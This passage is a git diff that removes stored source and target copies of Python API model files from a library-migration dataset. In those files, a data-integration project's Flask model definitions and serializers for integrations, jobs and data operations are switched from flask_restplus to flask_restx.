Id=source_connection.Id, - Schema=source_connection.Database.Schema, - TableName=source_connection.Database.TableName, - Query=source_connection.Database.Query, - ) - source_database = json.loads( - json.dumps(entity_source_database.__dict__, default=CommonModels.date_converter)) - source['Database'] = source_database - if source_connection.File is not None: - entity_source_file = DataIntegrationConnectionFileModel( - Id=source_connection.Id, - Folder=source_connection.File.Folder, - FileName=source_connection.File.FileName - ) - source_file = json.loads(json.dumps(entity_source_file.__dict__, default=CommonModels.date_converter)) - - if source_connection.File.Csv is not None: - entity_source_file_csv = DataIntegrationConnectionFileCsvModel( - Id=source_connection.Id, - HasHeader=source_connection.File.Csv.HasHeader, - Header=source_connection.File.Csv.Header, - Separator=source_connection.File.Csv.Separator, - ) - source_file_csv = json.loads( - json.dumps(entity_source_file_csv.__dict__, default=CommonModels.date_converter)) - source_file['Csv'] = source_file_csv - source['File'] = source_file - - if source_connection.Queue is not None: - entity_source_queue = DataIntegrationConnectionQueueModel( - Id=source_connection.Id, - TopicName=source_connection.Queue.TopicName, - ) - source_queue = json.loads(json.dumps(entity_source_queue.__dict__, default=CommonModels.date_converter)) - source['Queue'] = source_queue - source['Connection'] = ConnectionModels.get_connection_result_model(source_connection.Connection) - - target_connection = [x for x in 
data_integration.Connections if x.SourceOrTarget == 1][0] - entity_target = DataIntegrationConnectionModel( - Id=target_connection.Id, - SourceOrTarget=target_connection.SourceOrTarget - ) - target = json.loads(json.dumps(entity_target.__dict__, default=CommonModels.date_converter)) - - if target_connection.Database is not None: - entity_target_database = DataIntegrationConnectionDatabaseModel( - Id=target_connection.Id, - Schema=target_connection.Database.Schema, - TableName=target_connection.Database.TableName, - Query=target_connection.Database.Query, - ) - target_database = json.loads( - json.dumps(entity_target_database.__dict__, default=CommonModels.date_converter)) - target['Database'] = target_database - if target_connection.File is not None: - entity_target_file = DataIntegrationConnectionFileModel( - Id=target_connection.Id, - FileName=target_connection.File.FileName - ) - target_file = json.loads(json.dumps(entity_target_file.__dict__, default=CommonModels.date_converter)) - - if target_connection.File.Csv is not None: - entity_target_file_csv = DataIntegrationConnectionFileCsvModel( - Id=target_connection.Id, - HasHeader=target_connection.File.Csv.HasHeader, - Header=target_connection.File.Csv.Header, - Separator=target_connection.File.Csv.Separator, - ) - target_file_csv = json.loads( - json.dumps(entity_target_file_csv.__dict__, default=CommonModels.date_converter)) - target_file['Csv'] = target_file_csv - target['File'] = target_file - if target_connection.Queue is not None: - entity_source_queue = DataIntegrationConnectionQueueModel( - Id=target_connection.Id, - TopicName=target_connection.Queue.TopicName, - ) - target_queue = json.loads(json.dumps(entity_source_queue.__dict__, default=CommonModels.date_converter)) - target['Queue'] = target_queue - target['Connection'] = ConnectionModels.get_connection_result_model(target_connection.Connection) - columns = [] - for col in data_integration.Columns: - entity_column = DataIntegrationColumnModel( - Id=col.Id, - ResourceType=col.ResourceType, - SourceColumnName=col.SourceColumnName, - TargetColumnName=col.TargetColumnName, - ) - column = json.loads(json.dumps(entity_column.__dict__, default=CommonModels.date_converter)) - columns.append(column) - entity_model = DataIntegrationModel( - Id=data_integration.Id, - Code=data_integration.Code, - IsTargetTruncate=data_integration.IsTargetTruncate, - IsDelta=data_integration.IsDelta, - CreationDate=data_integration.CreationDate, - Comments=data_integration.Comments, - IsDeleted=data_integration.IsDeleted - ) - - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - if source is not None: - result_model['SourceConnection'] = source - result_model['TargetConnection'] = target - result_model['Columns'] = columns - return result_model - - @staticmethod - def get_data_integration_models(data_integrations: List[DataIntegration]) -> List[DataIntegrationModel]: - - entities = [] - for data_integration in data_integrations: - if data_integration.IsDeleted == 0: - entity = DataIntegrationModels.get_data_integration_model(data_integration) - entities.append(entity) - return entities diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$integration$models$DataIntegrationModels.py.target.py b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$integration$models$DataIntegrationModels.py.target.py deleted file mode 100644 index bf84257..0000000 --- 
a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$integration$models$DataIntegrationModels.py.target.py +++ /dev/null @@ -1,289 +0,0 @@ -import json -from typing import List - -from flask_restx import fields - -from controllers.common.models.CommonModels import EntityModel, CommonModels -from controllers.connection.models.ConnectionModels import ConnectionModels -from IocManager import IocManager -from models.dao.integration.DataIntegration import DataIntegration - - -class DataIntegrationModel(EntityModel): - - def __init__(self, - Id=None, - Code=None, - IsTargetTruncate=None, - IsDelta=None, - CreationDate=None, - Comments=None, - IsDeleted=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.Code = Code - self.IsTargetTruncate = IsTargetTruncate - self.IsDelta = IsDelta - self.CreationDate = CreationDate - self.Comments = Comments - self.IsDeleted = IsDeleted - - -class DataIntegrationConnectionModel: - - def __init__(self, - Id: int = None, - SourceOrTarget: int = None, - DataIntegration=None, - Database=None, - File=None, - Connection=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id: int = Id - self.SourceOrTarget: int = SourceOrTarget - self.DataIntegration = DataIntegration - self.Database = Database - self.File = File - self.Connection = Connection - - -class DataIntegrationConnectionDatabaseModel: - - def __init__(self, - Id: int = None, - Schema: str = None, - TableName: str = None, - Query: str = None, - *args, **kwargs): - self.Id: int = Id - self.Schema: str = Schema - self.TableName: str = TableName - self.Query: str = Query - - -class DataIntegrationConnectionFileModel: - - def __init__(self, - Id: int = None, - Folder: str = None, - FileName: str = None, - *args, **kwargs): - self.Id: int = Id - self.Folder: str = Folder - self.FileName: str = FileName - - -class DataIntegrationConnectionQueueModel: - def __init__(self, - Id: int = None, - TopicName: str = None, - *args, **kwargs): - self.Id: int = Id - self.TopicName: str = TopicName - - -class DataIntegrationConnectionFileCsvModel: - - def __init__(self, - Id: int = None, - HasHeader: bool = None, - Header: str = None, - Separator: str = None, - *args, **kwargs): - self.Id: int = Id - self.HasHeader: bool = HasHeader - self.Header: str = Header - self.Separator: str = Separator - - -class DataIntegrationColumnModel: - - def __init__(self, - Id=None, - ResourceType=None, - SourceColumnName=None, - TargetColumnName=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.ResourceType = ResourceType - self.SourceColumnName = SourceColumnName - self.TargetColumnName = TargetColumnName - - -class DataIntegrationModels: - ns = IocManager.api.namespace('DataIntegration', description='Data Integration endpoints', - path='/api/DataIntegration') - - data_integration_connection_database_model = IocManager.api.model('DataIntegrationConnectionDatabaseModel', { - 'Schema': fields.String(description='Schema', required=False), - 'TableName': fields.String(description='TableName', required=False), - 'Query': fields.String(description='Query', required=False), - }) - - data_integration_connection_file_csv_model = IocManager.api.model('DataIntegrationConnectionFileCsvModel', { - 'HasHeader': fields.Boolean(description='HasHeader', required=False), - 'Header': fields.String(description='Header', required=False), - 'Separator': fields.String(description='Separator', required=False), - }) - - 
data_integration_connection_file_model = IocManager.api.model('DataIntegrationConnectionFileModel', { - 'Folder': fields.String(description='Folder', required=False), - 'FileName': fields.String(description='FileName', required=False), - 'Csv': fields.Nested(data_integration_connection_file_csv_model, description='Csv'), - }) - data_integration_connection_queue_model = IocManager.api.model('DataIntegrationConnectionQueueModel', { - 'TopicName': fields.String(description='TopicName', required=False), - }) - data_integration_connection_model = IocManager.api.model('DataIntegrationConnectionModel', { - 'ConnectionName': fields.String(description='ConnectionName', required=False), - 'Database': fields.Nested(data_integration_connection_database_model, description='Database connection'), - 'File': fields.Nested(data_integration_connection_file_model, description='File connection'), - 'Queue': fields.Nested(data_integration_connection_queue_model, description='Queue connection'), - 'Columns': fields.String(description='Columns'), - }) - - data_integration_model = IocManager.api.model('DataIntegrationModel', { - 'Code': fields.String(description='Operation code value', required=True), - 'SourceConnections': fields.Nested(data_integration_connection_model, description='Source Connections', - required=False), - 'TargetConnections': fields.Nested(data_integration_connection_model, - description='Target Connections', - required=True), - 'IsTargetTruncate': fields.Boolean(description='IsTargetTruncate', required=True), - 'IsDelta': fields.Boolean(description='IsDelta'), - 'Comments': fields.String(description='Comments'), - }) - - @staticmethod - def get_data_integration_model(data_integration: DataIntegration) -> DataIntegrationModel: - source_list = [x for x in data_integration.Connections if x.SourceOrTarget == 0] - source = None - if source_list is not None and len(source_list) > 0: - source_connection = source_list[0] - entity_source = DataIntegrationConnectionModel( - Id=source_connection.Id, - SourceOrTarget=source_connection.SourceOrTarget - ) - source = json.loads(json.dumps(entity_source.__dict__, default=CommonModels.date_converter)) - - if source_connection.Database is not None: - entity_source_database = DataIntegrationConnectionDatabaseModel( - Id=source_connection.Id, - Schema=source_connection.Database.Schema, - TableName=source_connection.Database.TableName, - Query=source_connection.Database.Query, - ) - source_database = json.loads( - json.dumps(entity_source_database.__dict__, default=CommonModels.date_converter)) - source['Database'] = source_database - if source_connection.File is not None: - entity_source_file = DataIntegrationConnectionFileModel( - Id=source_connection.Id, - Folder=source_connection.File.Folder, - FileName=source_connection.File.FileName - ) - source_file = json.loads(json.dumps(entity_source_file.__dict__, default=CommonModels.date_converter)) - - if source_connection.File.Csv is not None: - entity_source_file_csv = DataIntegrationConnectionFileCsvModel( - Id=source_connection.Id, - HasHeader=source_connection.File.Csv.HasHeader, - Header=source_connection.File.Csv.Header, - Separator=source_connection.File.Csv.Separator, - ) - source_file_csv = json.loads( - json.dumps(entity_source_file_csv.__dict__, default=CommonModels.date_converter)) - source_file['Csv'] = source_file_csv - source['File'] = source_file - - if source_connection.Queue is not None: - entity_source_queue = DataIntegrationConnectionQueueModel( - Id=source_connection.Id, - 
TopicName=source_connection.Queue.TopicName, - ) - source_queue = json.loads(json.dumps(entity_source_queue.__dict__, default=CommonModels.date_converter)) - source['Queue'] = source_queue - source['Connection'] = ConnectionModels.get_connection_result_model(source_connection.Connection) - - target_connection = [x for x in data_integration.Connections if x.SourceOrTarget == 1][0] - entity_target = DataIntegrationConnectionModel( - Id=target_connection.Id, - SourceOrTarget=target_connection.SourceOrTarget - ) - target = json.loads(json.dumps(entity_target.__dict__, default=CommonModels.date_converter)) - - if target_connection.Database is not None: - entity_target_database = DataIntegrationConnectionDatabaseModel( - Id=target_connection.Id, - Schema=target_connection.Database.Schema, - TableName=target_connection.Database.TableName, - Query=target_connection.Database.Query, - ) - target_database = json.loads( - json.dumps(entity_target_database.__dict__, default=CommonModels.date_converter)) - target['Database'] = target_database - if target_connection.File is not None: - entity_target_file = DataIntegrationConnectionFileModel( - Id=target_connection.Id, - FileName=target_connection.File.FileName - ) - target_file = json.loads(json.dumps(entity_target_file.__dict__, default=CommonModels.date_converter)) - - if target_connection.File.Csv is not None: - entity_target_file_csv = DataIntegrationConnectionFileCsvModel( - Id=target_connection.Id, - HasHeader=target_connection.File.Csv.HasHeader, - Header=target_connection.File.Csv.Header, - Separator=target_connection.File.Csv.Separator, - ) - target_file_csv = json.loads( - json.dumps(entity_target_file_csv.__dict__, default=CommonModels.date_converter)) - target_file['Csv'] = target_file_csv - target['File'] = target_file - if target_connection.Queue is not None: - entity_source_queue = DataIntegrationConnectionQueueModel( - Id=target_connection.Id, - TopicName=target_connection.Queue.TopicName, - ) - target_queue = json.loads(json.dumps(entity_source_queue.__dict__, default=CommonModels.date_converter)) - target['Queue'] = target_queue - target['Connection'] = ConnectionModels.get_connection_result_model(target_connection.Connection) - columns = [] - for col in data_integration.Columns: - entity_column = DataIntegrationColumnModel( - Id=col.Id, - ResourceType=col.ResourceType, - SourceColumnName=col.SourceColumnName, - TargetColumnName=col.TargetColumnName, - ) - column = json.loads(json.dumps(entity_column.__dict__, default=CommonModels.date_converter)) - columns.append(column) - entity_model = DataIntegrationModel( - Id=data_integration.Id, - Code=data_integration.Code, - IsTargetTruncate=data_integration.IsTargetTruncate, - IsDelta=data_integration.IsDelta, - CreationDate=data_integration.CreationDate, - Comments=data_integration.Comments, - IsDeleted=data_integration.IsDeleted - ) - - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - if source is not None: - result_model['SourceConnection'] = source - result_model['TargetConnection'] = target - result_model['Columns'] = columns - return result_model - - @staticmethod - def get_data_integration_models(data_integrations: List[DataIntegration]) -> List[DataIntegrationModel]: - - entities = [] - for data_integration in data_integrations: - if data_integration.IsDeleted == 0: - entity = DataIntegrationModels.get_data_integration_model(data_integration) - entities.append(entity) - return entities diff --git 
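
Most of the collection builders in these files follow the same shape: loop over the entities, keep only rows whose IsDeleted flag is 0, and map each survivor through a single-entity converter. A compact equivalent with hypothetical names, just to make the shared pattern explicit:

from typing import Callable, Iterable, List


def convert_active(rows: Iterable, convert: Callable) -> List:
    # Same behaviour as the explicit loops above: skip soft-deleted rows
    # (IsDeleted == 0 keeps the row) and convert the rest one by one.
    return [convert(row) for row in rows if row.IsDeleted == 0]

# e.g. convert_active(data_integrations, DataIntegrationModels.get_data_integration_model)
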
a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$job$models$JobModels.py.diff b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$job$models$JobModels.py.diff deleted file mode 100644 index 6be1ada..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$job$models$JobModels.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/src/api/controllers/job/models/JobModels.py b/src/api/controllers/job/models/JobModels.py - index 4b218d2649130a1cce9bb48e838e9051996bbdef..598f275f11bdb1796b4ea0f6b3676a45758c08c4 100644 - --- a/src/api/controllers/job/models/JobModels.py - +++ b/src/api/controllers/job/models/JobModels.py -@@ -1,7 +1,7 @@ - import json - from typing import List - --from flask_restplus import fields -+from flask_restx import fields - - from controllers.common.models.CommonModels import EntityModel, CommonModels - from IocManager import IocManager diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$job$models$JobModels.py.source.py b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$job$models$JobModels.py.source.py deleted file mode 100644 index a40b1de..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$job$models$JobModels.py.source.py +++ /dev/null @@ -1,79 +0,0 @@ -import json -from typing import List - -from flask_restplus import fields - -from controllers.common.models.CommonModels import EntityModel, CommonModels -from IocManager import IocManager -from models.dao.aps.ApSchedulerJob import ApSchedulerJob -from models.dao.aps.ApSchedulerJobEvent import ApSchedulerJobEvent - - -class ApSchedulerJobModel(EntityModel): - __tablename__ = "ApSchedulerJob" - - def __init__(self, - JobId=None, - NextRunTime=None, - FuncRef=None, - IsDeleted=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.JobId = JobId - self.NextRunTime = NextRunTime - self.FuncRef = FuncRef - self.IsDeleted = IsDeleted - - -class ApSchedulerJobEventModel(): - def __init__(self, - JobId=None, - EventId=None, - EventName=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.JobId = JobId - self.EventId = EventId - self.EventName = EventName - - -class JobModels: - ns = IocManager.api.namespace('Job', description='Job scheduler endpoints', path='/api/Job') - - RemoveJobModel = IocManager.api.model('RemoveJob', { - 'JobId': fields.Integer(description='', required=True), - }) - - @staticmethod - def get_ap_scheduler_job_model(ap_scheduler_job: ApSchedulerJob) -> ApSchedulerJobModel: - result = ApSchedulerJobModel( - JobId=ap_scheduler_job.JobId, - NextRunTime=ap_scheduler_job.NextRunTime, - FuncRef=ap_scheduler_job.FuncRef, - Id=ap_scheduler_job.Id, - IsDeleted=ap_scheduler_job.IsDeleted, - ) - entity = json.loads(json.dumps(result.__dict__, default=CommonModels.date_converter)) - return entity - - @staticmethod - def get_ap_scheduler_job_models(ap_scheduler_jobs: List[ApSchedulerJob]) -> List[ApSchedulerJobModel]: - entities = [] - for ap_scheduler_job in ap_scheduler_jobs: - entity = JobModels.get_ap_scheduler_job_model(ap_scheduler_job) - entities.append(entity) - return entities - - @staticmethod - def get_ap_scheduler_job_events_model(ap_scheduler_job_events: List[ApSchedulerJobEvent]) -> List[ - ApSchedulerJobEventModel]: - entities = [] - for ap_scheduler_job_event in ap_scheduler_job_events: - result = 
ApSchedulerJobEventModel( - JobId=ap_scheduler_job_event.ApSchedulerJobId, - EventId=ap_scheduler_job_event.EventId, - EventName=ap_scheduler_job_event.ApSchedulerEvent.Name, - ) - entity = json.loads(json.dumps(result.__dict__, default=CommonModels.date_converter)) - entities.append(entity) - return entities diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$job$models$JobModels.py.target.py b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$job$models$JobModels.py.target.py deleted file mode 100644 index 743b6cb..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$job$models$JobModels.py.target.py +++ /dev/null @@ -1,79 +0,0 @@ -import json -from typing import List - -from flask_restx import fields - -from controllers.common.models.CommonModels import EntityModel, CommonModels -from IocManager import IocManager -from models.dao.aps.ApSchedulerJob import ApSchedulerJob -from models.dao.aps.ApSchedulerJobEvent import ApSchedulerJobEvent - - -class ApSchedulerJobModel(EntityModel): - __tablename__ = "ApSchedulerJob" - - def __init__(self, - JobId=None, - NextRunTime=None, - FuncRef=None, - IsDeleted=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.JobId = JobId - self.NextRunTime = NextRunTime - self.FuncRef = FuncRef - self.IsDeleted = IsDeleted - - -class ApSchedulerJobEventModel(): - def __init__(self, - JobId=None, - EventId=None, - EventName=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.JobId = JobId - self.EventId = EventId - self.EventName = EventName - - -class JobModels: - ns = IocManager.api.namespace('Job', description='Job scheduler endpoints', path='/api/Job') - - RemoveJobModel = IocManager.api.model('RemoveJob', { - 'JobId': fields.Integer(description='', required=True), - }) - - @staticmethod - def get_ap_scheduler_job_model(ap_scheduler_job: ApSchedulerJob) -> ApSchedulerJobModel: - result = ApSchedulerJobModel( - JobId=ap_scheduler_job.JobId, - NextRunTime=ap_scheduler_job.NextRunTime, - FuncRef=ap_scheduler_job.FuncRef, - Id=ap_scheduler_job.Id, - IsDeleted=ap_scheduler_job.IsDeleted, - ) - entity = json.loads(json.dumps(result.__dict__, default=CommonModels.date_converter)) - return entity - - @staticmethod - def get_ap_scheduler_job_models(ap_scheduler_jobs: List[ApSchedulerJob]) -> List[ApSchedulerJobModel]: - entities = [] - for ap_scheduler_job in ap_scheduler_jobs: - entity = JobModels.get_ap_scheduler_job_model(ap_scheduler_job) - entities.append(entity) - return entities - - @staticmethod - def get_ap_scheduler_job_events_model(ap_scheduler_job_events: List[ApSchedulerJobEvent]) -> List[ - ApSchedulerJobEventModel]: - entities = [] - for ap_scheduler_job_event in ap_scheduler_job_events: - result = ApSchedulerJobEventModel( - JobId=ap_scheduler_job_event.ApSchedulerJobId, - EventId=ap_scheduler_job_event.EventId, - EventName=ap_scheduler_job_event.ApSchedulerEvent.Name, - ) - entity = json.loads(json.dumps(result.__dict__, default=CommonModels.date_converter)) - entities.append(entity) - return entities diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$DataOperationModels.py.diff b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$DataOperationModels.py.diff deleted file mode 100644 index f7a184a..0000000 --- 
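
As the .diff files record, every one of these modules changes in exactly the same way: the single import of `fields` moves from flask-restplus, which is no longer maintained, to flask-restx, the community fork that preserves the same public API. Because the field classes keep their names and signatures, the call sites need no further edits:

# Before the migration (flask-restplus, now unmaintained):
#     from flask_restplus import fields
# After (flask-restx, the API-compatible community fork):
from flask_restx import fields

# Existing declarations continue to work unchanged, e.g.:
name = fields.String(description='Operation code value', required=True)
port = fields.Integer(description='Port')
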
a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$DataOperationModels.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/src/api/controllers/operation/models/DataOperationModels.py b/src/api/controllers/operation/models/DataOperationModels.py - index 4b218d2649130a1cce9bb48e838e9051996bbdef..598f275f11bdb1796b4ea0f6b3676a45758c08c4 100644 - --- a/src/api/controllers/operation/models/DataOperationModels.py - +++ b/src/api/controllers/operation/models/DataOperationModels.py -@@ -2,7 +2,7 @@ import json - from datetime import datetime - from typing import List - --from flask_restplus import fields -+from flask_restx import fields - - from controllers.common.models.CommonModels import EntityModel, CommonModels - from controllers.integration.models.DataIntegrationModels import DataIntegrationModels diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$DataOperationModels.py.source.py b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$DataOperationModels.py.source.py deleted file mode 100644 index 305e8bd..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$DataOperationModels.py.source.py +++ /dev/null @@ -1,165 +0,0 @@ -import json -from datetime import datetime -from typing import List - -from flask_restplus import fields - -from controllers.common.models.CommonModels import EntityModel, CommonModels -from controllers.integration.models.DataIntegrationModels import DataIntegrationModels -from IocManager import IocManager -from models.dao.common.Log import Log -from models.dao.operation import DataOperation -from models.dao.operation.DataOperationContact import DataOperationContact - - -class DataOperationIntegrationModel(EntityModel): - - def __init__(self, - Order: int = None, - Limit: int = None, - ProcessCount: int = None, - Integration=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Order: int = Order - self.Limit: int = Limit - self.ProcessCount: int = ProcessCount - self.Integration = Integration - - -class DataOperationContactModel(EntityModel): - def __init__(self, - Email: str = None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Email: str = Email - - -class DataOperationModel(EntityModel): - def __init__(self, - Id: int = None, - Name: str = None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id: int = Id - self.Name: str = Name - - -class DataIntegrationLogModel(): - - def __init__(self, - Id: int = None, - Type: str = None, - Content: str = None, - LogDatetime: datetime = None, - JobId: int = None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.Type = Type - self.Content = Content - self.LogDatetime = LogDatetime - self.JobId = JobId - - -class DataOperationModels: - ns = IocManager.api.namespace('DataOperation', description='Data Operation endpoints', - path='/api/DataOperation') - - operation_contact = IocManager.api.model('Data Operation Contact', { - 'Email': fields.String(description='Operation contact email', required=False), - }) - operation_integration = IocManager.api.model('Data Operation Integration', { - 'Limit': fields.Integer(description='Operation code value', required=False, example=10000), - 'ProcessCount': fields.Integer(description='Operation code value', required=True, example=1), - 'Integration': 
fields.Nested(DataIntegrationModels.data_integration_model, - description='Integration information', required=True) - }) - - create_data_operation_model = IocManager.api.model('CreateDataOperation', { - 'Name': fields.String(description='Data Operation Name', required=True), - 'Contacts': fields.List(fields.Nested(operation_contact), description='Contact Email list', - required=False), - 'Integrations': fields.List(fields.Nested(operation_integration), description='Integration code list', - required=True), - }) - - update_data_operation_model = IocManager.api.model('UpdateDataOperation', { - 'Name': fields.String(description='Data Operation Name', required=True), - 'Integrations': fields.List(fields.Nested(operation_integration), description='Integration code list', - required=True), - }) - - delete_data_operation_model = IocManager.api.model('DeleteDataOperationModel', { - 'Id': fields.Integer(description='Connection Database Id', required=True), - }) - - @staticmethod - def get_data_operation_contact_model(data_operation_contact: DataOperationContact) -> DataOperationContactModel: - - entity_model = DataOperationContactModel( - Email=data_operation_contact.Email, - ) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - return result_model - - @staticmethod - def get_data_operation_contact_models(data_operation_contacts: List[DataOperationContact]) -> List[ - DataOperationContactModel]: - entities = [] - for data_operation_contact in data_operation_contacts: - if data_operation_contact.IsDeleted == 0: - entity = DataOperationModels.get_data_operation_contact_model(data_operation_contact) - entities.append(entity) - return entities - - @staticmethod - def get_data_operation_result_model(data_operation: DataOperation) -> DataOperationModel: - entity_model = DataOperationModel( - Id=data_operation.Id, - Name=data_operation.Name, - ) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - integrations = [] - for data_operation_integration in data_operation.Integrations: - entity_model = DataOperationIntegrationModel( - Id=data_operation_integration.Id, - Order=data_operation_integration.Order, - Limit=data_operation_integration.Limit, - ProcessCount=data_operation_integration.ProcessCount, - ) - data_operation_integration_result_model = json.loads( - json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - integration = DataIntegrationModels.get_data_integration_model(data_operation_integration.DataIntegration) - data_operation_integration_result_model['Integration'] = integration - integrations.append(data_operation_integration_result_model) - contacts = DataOperationModels.get_data_operation_contact_models(data_operation.Contacts) - result_model['Contacts'] = contacts - result_model['Integrations'] = integrations - return result_model - - @staticmethod - def get_data_operation_result_models(data_operations: List[DataOperation]) -> List[DataOperationModel]: - entities = [] - for data_operation in data_operations: - if data_operation.IsDeleted == 0: - entity = DataOperationModels.get_data_operation_result_model(data_operation) - entities.append(entity) - return entities - - @staticmethod - def get_pdi_logs_model(logs: List[Log]) -> List[ - DataIntegrationLogModel]: - - entities = [] - for log in logs: - result = DataIntegrationLogModel( - Id=log.Id, - JobId=log.JobId, - Type='Info' if log.TypeId == 2 else 'Error', - Content=log.Content, - LogDatetime=log.LogDatetime, - ) - entity = 
json.loads(json.dumps(result.__dict__, default=CommonModels.date_converter)) - entities.append(entity) - return entities diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$DataOperationModels.py.target.py b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$DataOperationModels.py.target.py deleted file mode 100644 index b3d9e57..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$operation$models$DataOperationModels.py.target.py +++ /dev/null @@ -1,165 +0,0 @@ -import json -from datetime import datetime -from typing import List - -from flask_restx import fields - -from controllers.common.models.CommonModels import EntityModel, CommonModels -from controllers.integration.models.DataIntegrationModels import DataIntegrationModels -from IocManager import IocManager -from models.dao.common.Log import Log -from models.dao.operation import DataOperation -from models.dao.operation.DataOperationContact import DataOperationContact - - -class DataOperationIntegrationModel(EntityModel): - - def __init__(self, - Order: int = None, - Limit: int = None, - ProcessCount: int = None, - Integration=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Order: int = Order - self.Limit: int = Limit - self.ProcessCount: int = ProcessCount - self.Integration = Integration - - -class DataOperationContactModel(EntityModel): - def __init__(self, - Email: str = None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Email: str = Email - - -class DataOperationModel(EntityModel): - def __init__(self, - Id: int = None, - Name: str = None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id: int = Id - self.Name: str = Name - - -class DataIntegrationLogModel(): - - def __init__(self, - Id: int = None, - Type: str = None, - Content: str = None, - LogDatetime: datetime = None, - JobId: int = None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.Type = Type - self.Content = Content - self.LogDatetime = LogDatetime - self.JobId = JobId - - -class DataOperationModels: - ns = IocManager.api.namespace('DataOperation', description='Data Operation endpoints', - path='/api/DataOperation') - - operation_contact = IocManager.api.model('Data Operation Contact', { - 'Email': fields.String(description='Operation contact email', required=False), - }) - operation_integration = IocManager.api.model('Data Operation Integration', { - 'Limit': fields.Integer(description='Operation code value', required=False, example=10000), - 'ProcessCount': fields.Integer(description='Operation code value', required=True, example=1), - 'Integration': fields.Nested(DataIntegrationModels.data_integration_model, - description='Integration information', required=True) - }) - - create_data_operation_model = IocManager.api.model('CreateDataOperation', { - 'Name': fields.String(description='Data Operation Name', required=True), - 'Contacts': fields.List(fields.Nested(operation_contact), description='Contact Email list', - required=False), - 'Integrations': fields.List(fields.Nested(operation_integration), description='Integration code list', - required=True), - }) - - update_data_operation_model = IocManager.api.model('UpdateDataOperation', { - 'Name': fields.String(description='Data Operation Name', required=True), - 'Integrations': fields.List(fields.Nested(operation_integration), description='Integration code list', - 
required=True), - }) - - delete_data_operation_model = IocManager.api.model('DeleteDataOperationModel', { - 'Id': fields.Integer(description='Connection Database Id', required=True), - }) - - @staticmethod - def get_data_operation_contact_model(data_operation_contact: DataOperationContact) -> DataOperationContactModel: - - entity_model = DataOperationContactModel( - Email=data_operation_contact.Email, - ) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - return result_model - - @staticmethod - def get_data_operation_contact_models(data_operation_contacts: List[DataOperationContact]) -> List[ - DataOperationContactModel]: - entities = [] - for data_operation_contact in data_operation_contacts: - if data_operation_contact.IsDeleted == 0: - entity = DataOperationModels.get_data_operation_contact_model(data_operation_contact) - entities.append(entity) - return entities - - @staticmethod - def get_data_operation_result_model(data_operation: DataOperation) -> DataOperationModel: - entity_model = DataOperationModel( - Id=data_operation.Id, - Name=data_operation.Name, - ) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - integrations = [] - for data_operation_integration in data_operation.Integrations: - entity_model = DataOperationIntegrationModel( - Id=data_operation_integration.Id, - Order=data_operation_integration.Order, - Limit=data_operation_integration.Limit, - ProcessCount=data_operation_integration.ProcessCount, - ) - data_operation_integration_result_model = json.loads( - json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - integration = DataIntegrationModels.get_data_integration_model(data_operation_integration.DataIntegration) - data_operation_integration_result_model['Integration'] = integration - integrations.append(data_operation_integration_result_model) - contacts = DataOperationModels.get_data_operation_contact_models(data_operation.Contacts) - result_model['Contacts'] = contacts - result_model['Integrations'] = integrations - return result_model - - @staticmethod - def get_data_operation_result_models(data_operations: List[DataOperation]) -> List[DataOperationModel]: - entities = [] - for data_operation in data_operations: - if data_operation.IsDeleted == 0: - entity = DataOperationModels.get_data_operation_result_model(data_operation) - entities.append(entity) - return entities - - @staticmethod - def get_pdi_logs_model(logs: 